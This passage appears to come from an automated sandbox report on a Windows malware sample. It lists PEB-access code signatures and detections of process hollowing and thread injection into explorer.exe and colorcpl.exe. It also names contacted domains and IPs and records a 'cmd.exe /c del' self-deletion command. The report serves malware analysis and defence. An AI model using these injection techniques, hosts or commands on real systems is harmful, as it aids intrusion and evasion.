            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1513A mov eax, dword ptr fs:[00000030h]15_2_04F1513A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB8D34 mov eax, dword ptr fs:[00000030h]15_2_04FB8D34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F04120 mov eax, dword ptr fs:[00000030h]15_2_04F04120
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F04120 mov eax, dword ptr fs:[00000030h]15_2_04F04120
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F04120 mov eax, dword ptr fs:[00000030h]15_2_04F04120
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F04120 mov eax, dword ptr fs:[00000030h]15_2_04F04120
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F04120 mov ecx, dword ptr fs:[00000030h]15_2_04F04120
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]15_2_04EF3D34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]15_2_04EF3D34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]15_2_04EF3D34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]15_2_04EF3D34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]15_2_04EF3D34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]15_2_04EF3D34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]15_2_04EF3D34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]15_2_04EF3D34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]15_2_04EF3D34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]15_2_04EF3D34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]15_2_04EF3D34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]15_2_04EF3D34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF3D34 mov eax, dword ptr fs:[00000030h]15_2_04EF3D34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEAD30 mov eax, dword ptr fs:[00000030h]15_2_04EEAD30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE9100 mov eax, dword ptr fs:[00000030h]15_2_04EE9100
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE9100 mov eax, dword ptr fs:[00000030h]15_2_04EE9100
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE9100 mov eax, dword ptr fs:[00000030h]15_2_04EE9100
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF76E2 mov eax, dword ptr fs:[00000030h]15_2_04EF76E2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F116E0 mov ecx, dword ptr fs:[00000030h]15_2_04F116E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12AE4 mov eax, dword ptr fs:[00000030h]15_2_04F12AE4
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB8ED6 mov eax, dword ptr fs:[00000030h]15_2_04FB8ED6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F28EC7 mov eax, dword ptr fs:[00000030h]15_2_04F28EC7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F9FEC0 mov eax, dword ptr fs:[00000030h]15_2_04F9FEC0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12ACB mov eax, dword ptr fs:[00000030h]15_2_04F12ACB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F136CC mov eax, dword ptr fs:[00000030h]15_2_04F136CC
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1FAB0 mov eax, dword ptr fs:[00000030h]15_2_04F1FAB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE52A5 mov eax, dword ptr fs:[00000030h]15_2_04EE52A5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE52A5 mov eax, dword ptr fs:[00000030h]15_2_04EE52A5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE52A5 mov eax, dword ptr fs:[00000030h]15_2_04EE52A5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE52A5 mov eax, dword ptr fs:[00000030h]15_2_04EE52A5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE52A5 mov eax, dword ptr fs:[00000030h]15_2_04EE52A5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F646A7 mov eax, dword ptr fs:[00000030h]15_2_04F646A7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB0EA5 mov eax, dword ptr fs:[00000030h]15_2_04FB0EA5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB0EA5 mov eax, dword ptr fs:[00000030h]15_2_04FB0EA5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB0EA5 mov eax, dword ptr fs:[00000030h]15_2_04FB0EA5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFAAB0 mov eax, dword ptr fs:[00000030h]15_2_04EFAAB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFAAB0 mov eax, dword ptr fs:[00000030h]15_2_04EFAAB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1D294 mov eax, dword ptr fs:[00000030h]15_2_04F1D294
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1D294 mov eax, dword ptr fs:[00000030h]15_2_04F1D294
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7FE87 mov eax, dword ptr fs:[00000030h]15_2_04F7FE87
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF766D mov eax, dword ptr fs:[00000030h]15_2_04EF766D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0AE73 mov eax, dword ptr fs:[00000030h]15_2_04F0AE73
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0AE73 mov eax, dword ptr fs:[00000030h]15_2_04F0AE73
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0AE73 mov eax, dword ptr fs:[00000030h]15_2_04F0AE73
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0AE73 mov eax, dword ptr fs:[00000030h]15_2_04F0AE73
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0AE73 mov eax, dword ptr fs:[00000030h]15_2_04F0AE73
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F2927A mov eax, dword ptr fs:[00000030h]15_2_04F2927A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F9B260 mov eax, dword ptr fs:[00000030h]15_2_04F9B260
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F9B260 mov eax, dword ptr fs:[00000030h]15_2_04F9B260
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB8A62 mov eax, dword ptr fs:[00000030h]15_2_04FB8A62
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F74257 mov eax, dword ptr fs:[00000030h]15_2_04F74257
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE9240 mov eax, dword ptr fs:[00000030h]15_2_04EE9240
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE9240 mov eax, dword ptr fs:[00000030h]15_2_04EE9240
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE9240 mov eax, dword ptr fs:[00000030h]15_2_04EE9240
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE9240 mov eax, dword ptr fs:[00000030h]15_2_04EE9240
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF7E41 mov eax, dword ptr fs:[00000030h]15_2_04EF7E41
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF7E41 mov eax, dword ptr fs:[00000030h]15_2_04EF7E41
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF7E41 mov eax, dword ptr fs:[00000030h]15_2_04EF7E41
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF7E41 mov eax, dword ptr fs:[00000030h]15_2_04EF7E41
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF7E41 mov eax, dword ptr fs:[00000030h]15_2_04EF7E41
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF7E41 mov eax, dword ptr fs:[00000030h]15_2_04EF7E41
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F9FE3F mov eax, dword ptr fs:[00000030h]15_2_04F9FE3F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEE620 mov eax, dword ptr fs:[00000030h]15_2_04EEE620
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F24A2C mov eax, dword ptr fs:[00000030h]15_2_04F24A2C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F24A2C mov eax, dword ptr fs:[00000030h]15_2_04F24A2C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF8A0A mov eax, dword ptr fs:[00000030h]15_2_04EF8A0A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F03A1C mov eax, dword ptr fs:[00000030h]15_2_04F03A1C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1A61C mov eax, dword ptr fs:[00000030h]15_2_04F1A61C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1A61C mov eax, dword ptr fs:[00000030h]15_2_04F1A61C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEC600 mov eax, dword ptr fs:[00000030h]15_2_04EEC600
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEC600 mov eax, dword ptr fs:[00000030h]15_2_04EEC600
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEC600 mov eax, dword ptr fs:[00000030h]15_2_04EEC600
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F18E00 mov eax, dword ptr fs:[00000030h]15_2_04F18E00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEAA16 mov eax, dword ptr fs:[00000030h]15_2_04EEAA16
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEAA16 mov eax, dword ptr fs:[00000030h]15_2_04EEAA16
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE5210 mov eax, dword ptr fs:[00000030h]15_2_04EE5210
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE5210 mov ecx, dword ptr fs:[00000030h]15_2_04EE5210
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE5210 mov eax, dword ptr fs:[00000030h]15_2_04EE5210
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE5210 mov eax, dword ptr fs:[00000030h]15_2_04EE5210
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F237F5 mov eax, dword ptr fs:[00000030h]15_2_04F237F5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F103E2 mov eax, dword ptr fs:[00000030h]15_2_04F103E2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F103E2 mov eax, dword ptr fs:[00000030h]15_2_04F103E2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F103E2 mov eax, dword ptr fs:[00000030h]15_2_04F103E2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F103E2 mov eax, dword ptr fs:[00000030h]15_2_04F103E2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F103E2 mov eax, dword ptr fs:[00000030h]15_2_04F103E2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F103E2 mov eax, dword ptr fs:[00000030h]15_2_04F103E2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0DBE9 mov eax, dword ptr fs:[00000030h]15_2_04F0DBE9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F653CA mov eax, dword ptr fs:[00000030h]15_2_04F653CA
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F653CA mov eax, dword ptr fs:[00000030h]15_2_04F653CA
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F14BAD mov eax, dword ptr fs:[00000030h]15_2_04F14BAD
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F14BAD mov eax, dword ptr fs:[00000030h]15_2_04F14BAD
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F14BAD mov eax, dword ptr fs:[00000030h]15_2_04F14BAD
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB5BA5 mov eax, dword ptr fs:[00000030h]15_2_04FB5BA5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF1B8F mov eax, dword ptr fs:[00000030h]15_2_04EF1B8F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF1B8F mov eax, dword ptr fs:[00000030h]15_2_04EF1B8F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1B390 mov eax, dword ptr fs:[00000030h]15_2_04F1B390
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F67794 mov eax, dword ptr fs:[00000030h]15_2_04F67794
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F67794 mov eax, dword ptr fs:[00000030h]15_2_04F67794
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F67794 mov eax, dword ptr fs:[00000030h]15_2_04F67794
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12397 mov eax, dword ptr fs:[00000030h]15_2_04F12397
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA138A mov eax, dword ptr fs:[00000030h]15_2_04FA138A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F9D380 mov ecx, dword ptr fs:[00000030h]15_2_04F9D380
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF8794 mov eax, dword ptr fs:[00000030h]15_2_04EF8794
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F13B7A mov eax, dword ptr fs:[00000030h]15_2_04F13B7A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F13B7A mov eax, dword ptr fs:[00000030h]15_2_04F13B7A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEDB60 mov ecx, dword ptr fs:[00000030h]15_2_04EEDB60
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFFF60 mov eax, dword ptr fs:[00000030h]15_2_04EFFF60
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB8F6A mov eax, dword ptr fs:[00000030h]15_2_04FB8F6A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB8B58 mov eax, dword ptr fs:[00000030h]15_2_04FB8B58
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEDB40 mov eax, dword ptr fs:[00000030h]15_2_04EEDB40
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFEF40 mov eax, dword ptr fs:[00000030h]15_2_04EFEF40
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEF358 mov eax, dword ptr fs:[00000030h]15_2_04EEF358
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE4F2E mov eax, dword ptr fs:[00000030h]15_2_04EE4F2E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE4F2E mov eax, dword ptr fs:[00000030h]15_2_04EE4F2E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1E730 mov eax, dword ptr fs:[00000030h]15_2_04F1E730
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA131B mov eax, dword ptr fs:[00000030h]15_2_04FA131B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0F716 mov eax, dword ptr fs:[00000030h]15_2_04F0F716
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7FF10 mov eax, dword ptr fs:[00000030h]15_2_04F7FF10
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7FF10 mov eax, dword ptr fs:[00000030h]15_2_04F7FF10
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB070D mov eax, dword ptr fs:[00000030h]15_2_04FB070D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB070D mov eax, dword ptr fs:[00000030h]15_2_04FB070D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1A70E mov eax, dword ptr fs:[00000030h]15_2_04F1A70E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1A70E mov eax, dword ptr fs:[00000030h]15_2_04F1A70E
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00409B30 LdrLoadDll,6_2_00409B30
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.marmorariapiramide.online
            Source: C:\Windows\explorer.exeDomain query: www.emptycc.net
            Source: C:\Windows\explorer.exeDomain query: www.traexcel.com
            Source: C:\Windows\explorer.exeDomain query: www.rangerbuddys.com
            Source: C:\Windows\explorer.exeDomain query: www.omniriot.com
            Source: C:\Windows\explorer.exeNetwork Connect: 104.143.9.211 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.vetpipes.com
            Source: C:\Windows\explorer.exeNetwork Connect: 143.198.15.243 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 154.208.82.163 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 103.11.189.189 80Jump to behavior
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: DC0000Jump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeMemory written: C:\Users\user\Desktop\3cGH9Bakuq.exe base: 400000 value starts with: 4D5AJump to behavior
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeThread register set: target process: 3424Jump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeThread register set: target process: 3424Jump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3424Jump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess created: C:\Users\user\Desktop\3cGH9Bakuq.exe C:\Users\user\Desktop\3cGH9Bakuq.exeJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess created: C:\Users\user\Desktop\3cGH9Bakuq.exe C:\Users\user\Desktop\3cGH9Bakuq.exeJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\3cGH9Bakuq.exe'Jump to behavior
            Source: explorer.exe, 00000007.00000000.721665647.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 00000007.00000000.759104586.0000000001080000.00000002.00020000.sdmp, colorcpl.exe, 0000000F.00000002.929454695.0000000003770000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000007.00000000.759104586.0000000001080000.00000002.00020000.sdmp, colorcpl.exe, 0000000F.00000002.929454695.0000000003770000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.759104586.0000000001080000.00000002.00020000.sdmp, colorcpl.exe, 0000000F.00000002.929454695.0000000003770000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.759104586.0000000001080000.00000002.00020000.sdmp, colorcpl.exe, 0000000F.00000002.929454695.0000000003770000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000007.00000000.700488613.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Users\user\Desktop\3cGH9Bakuq.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
